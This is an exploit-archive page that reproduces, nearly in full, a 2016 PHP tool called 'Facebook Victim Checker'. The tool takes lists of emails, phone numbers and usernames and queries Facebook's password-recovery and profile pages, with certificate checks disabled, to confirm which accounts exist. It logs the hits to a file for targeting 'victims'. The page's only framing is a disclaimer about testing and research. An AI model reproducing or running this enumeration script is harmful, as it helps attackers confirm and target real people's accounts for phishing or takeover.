Advertisement






Facebook Victim Checker Script *youtube

CVE Category Price Severity
CWE-XX $Unknown Unknown
Author Risk Exploitation Type Date
Unknown Unknown Unknown 2016-03-20
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016030107

Below is a copy:

Facebook Victim Checker Script *youtube <?php 
# script title : Facebook  Victim Checker
# Author : Dz MinD Injector
# 20/03/2016
# Special Thx To Abderezak Programmer
# Facebook : https://www.facebook.com/Dz.MinD.Injector
# Some Bug Fixed
# Demo how to use script : https://www.youtube.com/watch?v=x0rpqrvF1rg
# Gratz To alla Algeria Hackerz & Free Palastin <3
@set_time_limit(0);
error_reporting(0);
echo "
<head>
<link rel='icon' type='image/ico' href='http://www.albertpalacci.org/wp-content/uploads/2014/08/fb-relationships-full.png'/>
<title>Facebook Victim Checker</title>
<body>
<center><p><b><font size='2' face='Trebuchet MS' color='#FFFFFF'>Contact:  Fb.com/Dz.MinD.Injector </font></b></p></center>';
<center><p><b><font size='2' face='Trebuchet MS' color='#FFFFFF'>Coded By : Dz MinD Injector </font></b></p></center>';
<form method='POST'>
</head>
<style>
textarea {
    background:#000000;
    resize:none;
    color: #00FF00 ;
    border:1px solid red ;
    border: 4px solid red ;
}
input {
    color: ##33CCFF;
    border:1px dotted #33CCFF;
    width: 20%;
}

html, body{
    
    background:#000000;
    color:#00FF00;
    font-family:monospace;
    height: 100%;
    text-decoration:  none;
}

</style>";
echo "
<center><span style='text-shadow: 0px 0px 10px red;'><font <font color='red' size='10'> check your victim facebook </font></span>

<p dir='ltr' align='center'>
<textarea cols='35' class='area'  rows='22' name='username'>Dz.MinD.Injector</textarea> 
<br>
<br>
<input type='submit' name='scan' value='Start Scaning'><br></p>";
if(file_exists("Dzmind.html")){
        chmod("Dzmind.html",0755);
        unlink("Dzmind.html");
}
function saveresult($user,$result){
        $file = fopen("Dzmind.html","a");
        fwrite($file,"$result : $user <br>");
        fclose($file);
}
function brute_mail($mail){
    $data = array('lsd'=>'AVpNLmOr','charset_test'=>',,,,,,','email'=>trim($mail),'did_submit'=>'Search');
    $ch = curl_init();      
    curl_setopt($ch, CURLOPT_URL, "https://mbasic.facebook.com/login/identify/?ctx=recover");
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
    curl_setopt($ch, CURLOPT_POST, TRUE);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); 
    $login = curl_exec($ch);
    if(preg_match("/Votre recherche ne donne aucu/",$login) or preg_match("/Your search did not return/",$login)){
         saveresult($mail,"Mail Not Found");
        echo "<a style='color:#ff0000;'>[-]Email Not found : $mail</a><br>";
    }else{
            saveresult($mail,"Mail Found");
        echo "<a style='color:#00ff00;'>[+]Email Found : </a><a href='https://www.facebook.com/search/top/?init=quick&q=".$mail."'> $mail</a><br>";
    
    }
}
function brute_phone($phone){
        $data = array('lsd'=>'AVpNLmOr','charset_test'=>',,,,,,','email'=>trim($phone),'did_submit'=>'Search');
    $ch = curl_init();      
    curl_setopt($ch, CURLOPT_URL, "https://mbasic.facebook.com/login/identify/?ctx=recover");
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
    curl_setopt($ch, CURLOPT_POST, TRUE);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); 
    $login = curl_exec($ch);
    if(preg_match("/Votre recherche ne donne aucu/",$login) or preg_match("/Your search did not return/",$login)){
         saveresult($phone,"Phone Not Found");
        echo "<a style='color:#ff0000;'>[-]Phone Not found : $phone</a><br>";
    }else{
            saveresult($phone,"Phone Found");
        echo "<a style='color:#00ff00;'>[+]Phone Found : </a><a href='https://www.facebook.com/search/top/?init=quick&q=".$phone."'> $phone</a><br>";
    
    }
}
function brute($user,$url){
    $ch = curl_init();      
    curl_setopt($ch, CURLOPT_URL, $url."$user");
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
    curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); 
    $login = curl_exec($ch);
    if(preg_match("/this page isn't available/",$login) or preg_match("/page nest malheureusement pas disponible/",$login) or preg_match("/
     We couldn't find anything for/",$login) or preg_match("/Aucun rsultat pour votre recherche/",$login)){
         saveresult($user,"Not Found");
        echo "<a style='color:#ff0000;'>[-]User Not found : $user</a><br>";
    }else{
            saveresult($user,"Found");
        echo "<a style='color:#00ff00;'>[+]User Found : </a><a href='https://facebook.com/".$user."'> $user </a><br>";
        
    
    }
}
if(isset($_POST['scan'])){
$username = explode("\n", $_POST['username']);
$i=0;
foreach($username as $users) {
    $users = @trim($users);    
    if(filter_var($users,FILTER_VALIDATE_EMAIL)){
     brute_mail($users); 
    }else if(is_numeric($users)){
         brute_phone($users); 
    }else{
        brute($users,"https://www.facebook.com/");
    }
    $i++;
    }
}
echo "<br><br><br>".$i." Accounts Scanned !";

echo"<br>
<style type='text/css'>
body {
background:

url('http://cdn-d4d.kxcdn.com/wp-content/uploads/2015/07/hacker_wallpapers-1.jpg') no-repeat center top,top left,top right;
<br>
<br>
<br>
"


?>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum